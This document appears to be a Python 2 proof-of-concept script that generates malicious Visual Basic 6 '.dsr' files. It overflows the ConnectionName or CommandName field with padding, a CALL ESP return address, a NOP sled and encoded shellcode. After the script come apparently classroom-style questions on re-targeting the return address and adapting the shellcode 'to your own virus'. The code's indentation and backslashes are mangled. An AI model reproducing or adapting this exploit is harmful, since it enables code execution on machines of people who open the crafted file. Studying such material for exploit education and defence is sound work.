import time
print "---------------------------------------------------------------------------"
print ' MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling Buffer Overflow/n'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org/n"
print " Once you create the file, open it with Visual Basic 6 and click on"
print " connection or command name."
print "---------------------------------------------------------------------------"
EIP = "/xFF/xBE/x3F/x7E" #call ESP from user32.dll
nop = "/x90/x90/x90/x90"
shellcode = /
"/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x4f/x49/x49/x49/x49/x49"+/
"/x49/x51/x5a/x56/x54/x58/x36/x33/x30/x56/x58/x34/x41/x30/x42/x36"+/
"/x48/x48/x30/x42/x33/x30/x42/x43/x56/x58/x32/x42/x44/x42/x48/x34"+/
"/x41/x32/x41/x44/x30/x41/x44/x54/x42/x44/x51/x42/x30/x41/x44/x41"+/
"/x56/x58/x34/x5a/x38/x42/x44/x4a/x4f/x4d/x4e/x4f/x4a/x4e/x46/x34"+/
"/x42/x50/x42/x30/x42/x50/x4b/x38/x45/x44/x4e/x43/x4b/x38/x4e/x47"+/
"/x45/x30/x4a/x47/x41/x30/x4f/x4e/x4b/x48/x4f/x54/x4a/x41/x4b/x38"+/
"/x4f/x55/x42/x52/x41/x30/x4b/x4e/x49/x54/x4b/x48/x46/x33/x4b/x48"+/
"/x41/x50/x50/x4e/x41/x43/x42/x4c/x49/x59/x4e/x4a/x46/x48/x42/x4c"+/
"/x46/x47/x47/x50/x41/x4c/x4c/x4c/x4d/x50/x41/x50/x44/x4c/x4b/x4e"+/
"/x46/x4f/x4b/x43/x46/x35/x46/x52/x46/x30/x45/x37/x45/x4e/x4b/x58"+/
"/x4f/x45/x46/x42/x41/x50/x4b/x4e/x48/x46/x4b/x48/x4e/x30/x4b/x44"+/
"/x4b/x48/x4f/x35/x4e/x41/x41/x30/x4b/x4e/x4b/x38/x4e/x51/x4b/x38"+/
"/x41/x50/x4b/x4e/x49/x38/x4e/x45/x46/x32/x46/x50/x43/x4c/x41/x33"+/
"/x42/x4c/x46/x46/x4b/x48/x42/x34/x42/x33/x45/x38/x42/x4c/x4a/x47"+/
"/x4e/x30/x4b/x38/x42/x34/x4e/x50/x4b/x58/x42/x47/x4e/x41/x4d/x4a"+/
"/x4b/x58/x4a/x36/x4a/x30/x4b/x4e/x49/x50/x4b/x48/x42/x48/x42/x4b"+/
"/x42/x30/x42/x50/x42/x30/x4b/x38/x4a/x56/x4e/x43/x4f/x55/x41/x33"+/
"/x48/x4f/x42/x46/x48/x35/x49/x38/x4a/x4f/x43/x58/x42/x4c/x4b/x37"+/
"/x42/x55/x4a/x36/x42/x4f/x4c/x58/x46/x50/x4f/x35/x4a/x36/x4a/x59"+/
"/x50/x4f/x4c/x38/x50/x50/x47/x55/x4f/x4f/x47/x4e/x43/x56/x41/x56"+/
"/x4e/x46/x43/x56/x50/x32/x45/x46/x4a/x37/x45/x36/x42/x50/x5a"
try:
choice = int(raw_input('Choose 1 for "ConnectionName", 2 for "CommandName" bof or '+/
'3 to quit:/n==> '))
if choice == 1:
buff = 'Connection1' + " " * 559 + EIP + "A" * 12 + nop + shellcode + nop
try:
vb_dsr = /
'VERSION 5.00/n'+/
'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1/n'+/
' ClientHeight = 6315/n'+/
' ClientLeft = 0'+/
' ClientTop = 0/n'+/
' ClientWidth = 7935/n'+/
' _ExtentX = 13996/n'+/
' _ExtentY = 11139/n'+/
' FolderFlags = 1/n'+/
' TypeInfoCookie = 0/n'+/
' Version = 4/n'+/
' NumConnections = 1/n'+/
' BeginProperty Connection1/n'+/
' ConnectionName = "' + buff + '"/n'+/
' ConnDispId = 1001/n'+/
' SourceOfData = 3/n'+/
' QuoteChar = 34/n'+/
' SeparatorChar = 46/n'+/
' EndProperty/n'+/
' NumRecordsets = 0/n'+/
'End' + "/x0D/x0A" #"/x0D/x0A" ==> EOF
out_file = open('ConnectionName.dsr','w')
out_file.write(vb_dsr)
out_file.close()
print "FILE CREATED!"
except:
print "Something wrong in file creation!"
if choice == 2:
buff = 'Command1' + " " * 566 + EIP + "A" * 12 + nop + shellcode + nop
try:
vb_dsr = /
'VERSION 5.00/n'+/
'Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1/n'+/
' ClientHeight = 6315/n'+/
' ClientLeft = 0'+/
' ClientTop = 0/n'+/
' ClientWidth = 7935/n'+/
' _ExtentX = 13996/n'+/
' _ExtentY = 11139/n'+/
' FolderFlags = 1/n'+/
' TypeInfoCookie = 0/n'+/
' Version = 4/n'+/
' NumConnections = 1/n'+/
' BeginProperty Connection1/n'+/
' ConnectionName = "Connection1"/n'+/
' ConnDispId = 1001/n'+/
' SourceOfData = 3/n'+/
' QuoteChar = 34/n'+/
' SeparatorChar = 46/n'+/
' EndProperty/n'+/
' NumRecordsets = 1/n'+/
' BeginProperty Recordset1/n'+/
' CommandName = "' + buff + '"/n'+/
' CommDispId = 1002/n'+/
' RsDispId = -1/n'+/
' ActiveConnectionName= "Connection1"/n'+/
' NumFields = 0/n'+/
' NumGroups = 0/n'+/
' ParamCount = 0/n'+/
' RelationCount = 0/n'+/
' AggregateCount = 0/n'+/
' EndProperty/n'+/
'End' + "/x0D/x0A" #"/x0D/x0A" ==> EOF
out_file = open('CommandName.dsr','w')
out_file.write(vb_dsr)
out_file.close()
print "FILE CREATED!"
except:
print "Something wrong in file creation!"
if choice == 3:
print "Be safe!"
if choice !=1 and choice != 2 and choice != 3:
print "D'oh! You MUST choose a value between 1 and 3"
except:
print "mmm... ok, you want it..."
time.sleep(4)
print "London Bridge is falling down,/nFalling down, falling down/nLondon Bridge is falling down/nMy fair lady" * 99999
Question:
*.dsr File analysis
1. Find a real .dsr file, then compare it with vb_dsr string. Eg, the size of a common .dsr file, its format, especially its EOF flag, that is, it can’t appear in your shell code, or else, your shell code may not function as expected.
Source code analysis
2. What do variable EIP stand for? Can you replace it by another address with the same instruction CALL ESP by using debuggers such as OllyDbg? Could you replace the file “User32.dll” by other necessary DLL loading by VB6.0, then modify the address of EIP properly. Finally, indicate the possibility of changing CALL ESP by JMP ESP. (Hint: the addresses of such instruction as well as the APIs vary in different release of DLL, so it’s recommendable to find them in your own computer in help of tool like Depends)
3. Notice that between shell code and EIP, there exists a space of 16 Bytes of no use. Explain why?
Shellcode Analysis
4. If you’ve successfully solved the first 3 questions, you’re now familiar with the principle of Local BOF. Now the rest work is find the result of the shellcode by referencing Intel Machine Code, and then you can finally modify it easily to your own virus.
扫一扫
2万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
